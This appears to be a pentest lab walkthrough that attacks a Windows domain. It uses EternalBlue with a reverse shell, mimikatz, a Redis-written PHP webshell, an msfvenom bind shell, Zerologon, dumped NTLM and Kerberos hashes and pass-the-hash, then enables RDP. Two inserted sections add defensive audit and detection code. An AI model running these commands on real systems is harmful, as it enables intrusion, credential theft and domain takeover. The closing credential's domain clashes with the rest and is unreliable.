Network configuration

External Win7:
  ip1: 192.168.127.91/255.255.255.0, gw: 192.168.127.2 (NAT mode)
  ip2: 10.0.20.98 - vmnet1 (host-only mode)
Domain member host:
  10.0.20.99 - vmnet1 (host-only mode)
  10.0.10.111 - vmnet2 (host-only mode)
Domain controller:
  10.0.10.110 - vmnet2 (host-only mode)
Credentials:
  Win7: win7/admin
  win2016: Administrator/Admin@123, vulntarget.com\win2016 Admin#123
  win2019: vulntarget.com\administrator Admin@666

Information gathering

Host scanning

arp-scan -l scans for live hosts on the same subnet. One live host is found: 192.168.127.91

Port scanning

Scan the ports of the live target:

nmap -sC -T4 192.168.127.91

The target is Windows 7 with port 445 open, so EternalBlue (MS17-010) is tried against it.

Internal host penetration

On Kali, run:

msfconsole
msf6 > search 17-010
msf6 > use 0
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set lport 6666
msf6 > set lhost 192.168.127.129
msf6 > set rhosts 192.168.127.91
msf6 > run
meterpreter > shell
C:\Windows\System32> ipconfig

The output contains garbled characters, so switch the code page first:

C:\Windows\System32> CHCP 65001      # 65001 = UTF-8 code page
C:\Windows\System32> ipconfig        # two subnets: 192.168.127.0/24 and 10.0.20.0/24
C:\Windows\System32> whoami          # the current user is SYSTEM
C:\Windows\System32> tasklist /svc   # list processes; no antivirus is running
C:\Windows\System32> exit            # leave the command shell
meterpreter > load kiwi              # load the mimikatz module
meterpreter > creds_all              # dump all logon credentials: user win7, password admin


Web penetration

Browsing directly to http://192.168.127.91/ shows Tongda OA. The version page http://192.168.127.91/inc/expired.php gives the current version as 11.3. A web search shows that Tongda OA 11.3 has a file inclusion vulnerability; reference: https://blog.csdn.net/hackzkaq/article/details/115900500. A one-click GUI tool is used to obtain a webshell, and AntSword connects to it successfully. In AntSword's command terminal the current user is also SYSTEM.

Lateral movement

Process migration: the shell obtained at first is very fragile, so it is moved into a stable process on the target, without any writes to disk, which also makes the intrusion harder to detect. The automatic migration command (run post/windows/manage/migrate) picks a suitable process and migrates into it.

meterpreter > run post/windows/manage/migrate   # migrated from spoolsv.exe (PID 1080) to notepad.exe (PID 4800)

Show the local subnets:

meterpreter > run get_local_subnets

Add a route:

meterpreter > run autoroute -s 10.0.20.0/24

Or:

meterpreter > background
msf6 > sessions
msf6 exploit(windows/smb/ms17_010_eternalblue) > use post/multi/manage/autoroute
msf6 exploit(windows/smb/ms17_010_eternalblue) > set session 1
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
meterpreter > background

Discover live hosts:

msf6 exploit(windows/smb/ms17_010_eternalblue) > use post/windows/gather/arp_scanner
msf6 exploit(windows/smb/ms17_010_eternalblue) > set session 1
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.0.20.1-254
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

Another live host is found: 10.0.20.99

Start the SOCKS5 proxy:

msf6 exploit(windows/smb/ms17_010_eternalblue) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > run

Port scanning

First edit the /etc/proxychains4.conf configuration file:

vim /etc/proxychains4.conf
socks5 127.0.0.1 1080

Scan the target's common ports with nmap through the proxy:

proxychains nmap -sT -Pn 10.0.20.99 -p22,23,80,139,445,1433,3306,3389,6379,8080

10.0.20.99 has ports 6379 and 80 open. On the local machine the SOCKS5 client Proxifier is used. Scanning with dirsearch finds a sensitive phpinfo.php page:

python3 dirsearch.py -l url.txt -t 10 -e * -i 200,302 --format csv -o C:\Users\backlion\Desktop\dirsearch-master\xxx.com.csv

Or, on the Kali attack machine:

proxychains python dirsearch.py -u http://10.0.20.99 -i 200
proxychains dirsearch -u "http://10.0.20.99" --proxy=socks5://127.0.0.1:1080 -t 5

The phpinfo.php page exposes the site's absolute path: C:/phpStudy/PHPTutorial/WWW/

http://10.0.20.99/phpinfo.php
http://10.0.20.99/l.php

Redis unauthenticated access

redis-cli can connect remotely without a password:

proxychains redis-cli -h 10.0.20.99

Writing a webshell via Redis

10.0.20.99:6379> CONFIG set dir "C:/phpStudy/PHPTutorial/WWW/"    # switch to the absolute web path where a shell can be written
10.0.20.99:6379> set x "\n\n\n<?php @eval($_POST['x']);?>\n\n\n"   # write the one-line webshell
10.0.20.99:6379> config set dbfilename shell.php                   # name the dump file shell.php
10.0.20.99:6379> save

Set the proxy in AntSword on the local machine and connect to the webshell. The current user is SYSTEM.
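The write above works only because the instance is reachable from the network, needs no password, and still exposes CONFIG, so dir and dbfilename can be pointed at the web root at runtime. As an added defensive counterpart (example code written for this page, not code from the original post or from Redis), the following audits a redis.conf for exactly those settings. The two sample configs are constructed; the check for CONFIG looks for rename-command, and does not parse the Redis 6+ ACL syntax that can restrict the command as well.

```python
"""Audit a redis.conf for the settings that make the unauthenticated
"CONFIG SET dir / dbfilename + SAVE" file write possible.
Added defensive example; not code from the original post or from Redis."""


def parse_redis_conf(text):
    """Map each directive (lower-cased) to the list of values seen for it.
    Later occurrences win in Redis, so callers look at the last entry."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        conf.setdefault(key, []).append(value)
    return conf


# Addresses that keep Redis off the network. "-::1" is the Redis 7 default
# spelling (the leading '-' means "do not fail if the address is missing").
LOOPBACK = {"127.0.0.1", "::1", "-::1", "-127.0.0.1"}


def audit_redis_conf(text):
    """Return a list of findings; an empty list means none of the weak
    settings seen in the walkthrough are present."""
    conf = parse_redis_conf(text)
    findings = []

    binds = conf.get("bind")
    if not binds:
        findings.append("no 'bind' directive: Redis listens on all interfaces")
    else:
        exposed = sorted(set(binds[-1].split()) - LOOPBACK)
        if exposed:
            findings.append(f"bind exposes non-loopback addresses: {exposed}")

    if conf.get("protected-mode", ["yes"])[-1].lower() != "yes":
        findings.append("protected-mode is off, so an unbound instance accepts remote clients")

    passwords = conf.get("requirepass", [])
    if not passwords or passwords[-1].strip('"\'') == "":
        findings.append("no requirepass: every client that reaches the port is fully authorised")

    # rename-command CONFIG "" removes the command entirely; Redis 6+ ACLs
    # (user ... -config) are an alternative this simple check does not parse.
    renamed = {v.split()[0].upper() for v in conf.get("rename-command", []) if v.split()}
    if "CONFIG" not in renamed:
        findings.append("CONFIG is reachable: 'CONFIG SET dir/dbfilename' can aim the RDB dump at a web root")

    return findings


# Constructed sample configs (not taken from the target) for a quick run.
WEAK_CONF = """
# listens everywhere, no password, CONFIG available
bind 0.0.0.0
protected-mode no
port 6379
dir ./
"""

HARDENED_CONF = """
bind 127.0.0.1 -::1
protected-mode yes
port 6379
requirepass replace-with-a-long-random-secret
rename-command CONFIG ""
rename-command SAVE ""
dir /var/lib/redis
"""

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"{name}: {audit_redis_conf(conf) or 'no findings'}")
```

Run against the weak sample it reports four findings (exposed bind, protected-mode off, no requirepass, CONFIG reachable); the hardened sample reports none. Restricting the bind address is the control that matters most here, since the walkthrough reached Redis only by pivoting onto the 10.0.20.0/24 network.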

Uploading the MSF backdoor

Generate a bind shellcode:

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=3333 -f exe > shell.exe

Upload shell.exe to 10.0.20.99 with AntSword and run it.

Configuring the listener

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 3333
set RHOST 10.0.20.99
run

Disable the firewall:

netsh firewall set opmode mode=disable

Run shell.exe from AntSword's command terminal.

Collect hosts on the same subnet:

meterpreter > arp

The 10.0.10.110 subnet shows up. Migrate the process:

run post/windows/manage/migrate

meterpreter > sysinfo
meterpreter > shell
C:\phpStudy\PHPTutorial\WWW> CHCP 65001

Collect IP information:

C:\phpStudy\PHPTutorial\WWW> ipconfig /all

A domain exists. Look up the domain controller's computer name:

C:\phpStudy\PHPTutorial\WWW> net group "domain controllers" /domain

Look up the domain administrators:

C:\phpStudy\PHPTutorial\WWW> net group "enterprise admins" /domain

Domain privilege escalation

Add routes:

meterpreter > run post/multi/manage/autoroute
meterpreter > run autoroute -p
meterpreter > run post/windows/gather/enum_domain

proxychains4 nmap -Pn -sT 10.0.10.110 -p6379,80,8080,445,139

Download and install the impacket package:

git clone https://github.com/SecureAuthCorp/impacket
cd impacket
python3 -m pip install -r requirements.txt
python3 -m pip install .

Download the CVE-2020-1472 EXP:

git clone https://github.com/dirkjanm/CVE-2020-1472.git
cd CVE-2020-1472

Run the EXP:

proxychains python3 cve-2020-1472-exploit.py WIN2019 10.0.10.110

Get the domain administrator hash:

cd /opt/impacket/examples
proxychains python3 secretsdump.py vulntarget.com/WIN2019\$@10.0.10.110 -no-pass

Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a3dd8e4a352b346f110b587e1d1d1936:::
vulntarget.com\win2016:1601:aad3b435b51404eeaad3b435b51404ee:dfc8d2bfa540a0a6e2248a82322e654e:::
WIN2019$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN2016$:1602:aad3b435b51404eeaad3b435b51404ee:d0b248a756f62bbef5b286c7be19c7a9:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:70a1edb09dbb1b58f1644d43fa0b40623c014b690da2099f0fc3a8657f75a51d
Administrator:aes128-cts-hmac-sha1-96:04c435638a00755c0b8f12211d3e88a1
Administrator:des-cbc-md5:dcc29476a789ec9e
krbtgt:aes256-cts-hmac-sha1-96:f7a968745d4f201cbeb73f4b1ba588155cfd84ded34aaf24074a0cfe95067311
krbtgt:aes128-cts-hmac-sha1-96:f401ac35dc1c6fa19b0780312408cded
krbtgt:des-cbc-md5:10efae67c7026dbf
vulntarget.com\win2016:aes256-cts-hmac-sha1-96:e4306bef342cd8215411f9fc38a063f5801c6ea588cc2fee531342928b882d61
vulntarget.com\win2016:aes128-cts-hmac-sha1-96:6da7e9e046c4c61c3627a3276f5be855
vulntarget.com\win2016:des-cbc-md5:6e2901311c32ae58
WIN2019$:aes256-cts-hmac-sha1-96:092c877c3b20956347d535d91093bc1eb16b486b630ae2d99c0cf15da5db1390
WIN2019$:aes128-cts-hmac-sha1-96:0dca147d2a216089c185d337cf643e25
WIN2019$:des-cbc-md5:01c8894f541023bc
WIN2016$:aes256-cts-hmac-sha1-96:414bc47994e3bf616da9e115ba8c7e528ce17315734337479d6f67df3ca6e682
WIN2016$:aes128-cts-hmac-sha1-96:8b30d9d37e7f7f474124382d2fe75950
WIN2016$:des-cbc-md5:6d97313875e362c8

With the administrator hash in hand, run the privilege escalation EXP:

proxychains python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 Administrator@10.0.10.110
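The dump above carries the forensic trace of Zerologon: the exploit sets the domain controller's computer account password to empty, so WIN2019$ shows the NT hash of the empty string (31d6cfe0d16ae931b73c59d7e0c089c0, the same value the disabled Guest account legitimately has), while WIN2016$ still has a real hash. The following is an added defensive example written for this page (not code from the original post, from impacket or from the exploit repository) that parses secretsdump-style output and flags empty-password accounts, separating machine accounts from the rest; the sample input is the NTLM section of the dump shown above plus two Kerberos lines to show they are skipped.

```python
"""Flag accounts in a secretsdump-style NTDS dump whose NT hash is the hash of
the empty password. After Zerologon (CVE-2020-1472) the DC's computer account
has exactly that hash. Added defensive example; not code from the original
post, impacket or the exploit repository."""
import re

# NT hash (MD4 of the UTF-16LE empty string): the value secretsdump prints for
# an account whose password is empty.
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"

# user:rid:lmhash:nthash::: as printed by secretsdump; the Kerberos key lines
# ("user:aes256-cts-hmac-sha1-96:...") deliberately do not match.
DUMP_LINE = re.compile(
    r"^(?P<name>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::"
)


def parse_secretsdump(text):
    """Return one dict per NTLM hash line, skipping status and Kerberos lines."""
    rows = []
    for raw in text.splitlines():
        m = DUMP_LINE.match(raw.strip())
        if m:
            rows.append({"name": m["name"], "rid": int(m["rid"]),
                         "lm": m["lm"].lower(), "nt": m["nt"].lower()})
    return rows


def find_empty_password_accounts(text):
    """Split empty-password accounts into machine accounts (name ends in '$';
    for a domain controller this is the Zerologon residue) and everything else
    (typically the disabled Guest account, which is expected)."""
    result = {"machine": [], "other": []}
    for row in parse_secretsdump(text):
        if row["nt"] == EMPTY_NT_HASH:
            bucket = "machine" if row["name"].endswith("$") else "other"
            result[bucket].append(row["name"])
    return result


# NTLM lines from the dump shown in the post, plus two Kerberos lines to show
# they are ignored by the parser.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a3dd8e4a352b346f110b587e1d1d1936:::
vulntarget.com\\win2016:1601:aad3b435b51404eeaad3b435b51404ee:dfc8d2bfa540a0a6e2248a82322e654e:::
WIN2019$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN2016$:1602:aad3b435b51404eeaad3b435b51404ee:d0b248a756f62bbef5b286c7be19c7a9:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:70a1edb09dbb1b58f1644d43fa0b40623c014b690da2099f0fc3a8657f75a51d
WIN2019$:des-cbc-md5:01c8894f541023bc
"""

if __name__ == "__main__":
    hits = find_empty_password_accounts(SAMPLE_DUMP)
    for name in hits["machine"]:
        print(f"ALERT: machine account {name} has an empty password (Zerologon indicator)")
    for name in hits["other"]:
        print(f"note: {name} has an empty password")
```

On the sample it returns WIN2019$ as the only machine account with an empty password and Guest as the only other one. An empty machine-account password is never a normal state for a domain-joined host, and on a DC it also desynchronises the password stored in AD from the one in the DC's local LSA secrets, so the DC stops being able to authenticate as itself; the usual remediation is to restore the original machine password (the dirkjanm repository used above ships a restorepassword.py for this) and to apply the August 2020 Netlogon updates with enforcement mode enabled. On the DC itself the same event leaves a 4742 (computer account changed) record for the DC's own computer object with an ANONYMOUS LOGON subject, which is the log-side indicator to alert on.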
Enable the 3389 remote desktop port:

reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

Log in directly over 3389:

proxychains rdesktop 10.0.10.110

Account: balsec.com\administrator   Password: Admin@666